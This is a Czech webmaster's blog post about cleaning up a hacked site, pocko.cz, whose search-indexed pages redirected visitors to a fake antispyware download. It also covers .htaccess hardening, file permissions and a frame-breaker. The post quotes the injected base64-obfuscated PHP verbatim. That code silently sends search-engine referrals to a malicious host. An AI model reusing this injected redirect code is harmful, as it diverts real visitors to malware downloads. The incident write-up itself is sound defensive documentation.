Home Blog SEO [SOLVED] - pocko cz index přesměrován na vir

[SOLVED] - pocko cz index přesměrován na vir

Popis: SOLVED - Kontrola indexace google zobrazila stránky přesměrovávané na vir. Obnoveno ze zálohy. Ochrana proti dalšímu vniknutí. Oprava a změna titulku.
Klíčová slova:
Hits: 2095
Hodnocení uživatelů: / 0
NejhoršíNejlepší 
Blog - SEO
Napsal uživatel Administrator   
Pondělí, 10 Říjen 2011 20:24

Kontrola indexace google:

duplicitní titulek, popis dobry,

strana-3 google-site-pocko-cz

Odkazy jsou přesměrovány javascript

javascript-velikopopovecky.osa.pl

dál směruje na stažení viru, maskovanej za rádoby antispyware.

vir-velikopopovecky.osa.pl

wamos test

shrnutí:

  1. vyřešit (obrovský) problém redirectu indexovaných stránek na vir
  2. pak se uvidí,

pokračování 15.10.2011

v skriptu nalezeny pasáže

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICgh
 JHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnP
 SRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaX
 N0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzd
 HJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikg
 b3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iK
 SBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYX
 BvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIs
 IndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyK
 CRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi
 5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJ
 HJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3
 RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2
 dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0c
 igkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIp
 KSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsI
 mludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zdGJqYnBpci5vc2EucGwvIik7
 DQoJZXhpdCgpOw0KfQ0KfQ0KCX0NCgl9")); echo $sett["keywords"]; ?>" />  

pozn. kodovaný skript byl v jednom řádku, kvůli formátování sem musel nasekat na řádky
generátor stránek obnoven ze zálohy, redirecty zmizely , voala :D

ochrana proti dalšímu vniknutí

  • stránky (generátor) sice obnoveny, ale zůstaly bezpočnostní díry (ve ftp). Druhý den byl opět cizí kódovaný skript v php souborech.
  • standardně nakopírován prázdný soubor index.html
  • htaccess protekce složky s obrázky
     
     #.htaccess to prevent access to .php files 
     
     <Files *.php>
     Order Deny,Allow
     </Files>
     
     ### This part says to deny access to EVERYTHING. Afterwards, you'll allow access to JUST the permitted items. See next FilesMatch section.
     <FilesMatch .*>
     Order Deny,Allow
     Deny from all
     </FilesMatch>
     ### NOTE: Add only appropriate PERMITTED filetypes to this list, depending on which folder you're protecting:
     <FilesMatch .*\.(JPG|jpg|JPEG|jpeg|GIF|gif|PNG|png|pdf|PDF)>
     Order Deny,Allow
     Allow from all
     </FilesMatch>
     
     
     # This code can help for directories where "NO" script should be run from
     # but for whatever reason, you need Directory permissions to be 777 - which is wide-open and insecure by itself.
     # Examples Directories would include: any 'images' dir., the 'bmz' dir. if using ImageHandler 2, the html_includes languages folder, etc
     
     # Prevent directory viewing and the ability of any scripts to run.
     # No type of script, be it PHP, PERL or whatever can normally be executed if ExecCGI is disabled.
     OPTIONS -Indexes -ExecCGI
     

pokračování 16.10.2011

změna / doplnění titulku

  • změna titulku z formátu [site title] - [videa] - [video] na  - [video] | [kategorie] | [site title]
  • změna titulku kategorie, privat, podobně jako videa
  • doplnění doplněny titulky stránky [nove] a [nej] k strance nove a nej
  • dolpnění stránky do titulku
  • doplněn titulek stránky hledání o [hledani] [slovo]

zabezpečení proti vniknutí práva soubory a adresáře

  • 775 pro diry
  • 644 pro soubory php

zlomení frames - ochrana protí "kradení" stránek přes iframe

  • smelina.cz používala iframe a zobrazovala pocko.cz, to by snad tolik nevadilo, kdyby smelina.cz nebyla na prvnim miste ve vyhledávání.
  • nejprve ošetřeno v souboru .htaccess
     #smelina.cz zakazano
    RewriteCond %{HTTP_REFERER} ^http://(.+\.)?smelina\.cz/ [NC]
    RewriteRule .*\..*$ http://i.imgur.com/qX4w7.gif [L]
  • smelina.cz za několik měsíců zareagovala a iframe stáhla, přeto k ochraně pře podobnými praktikami vložen framebreaker nahoru za <body>, funguje výborně
     <script type="text/javascript">
    if (top.location != self.location) top.location = self.location;
    </script>
Aktualizováno Neděle, 19 Únor 2012 21:24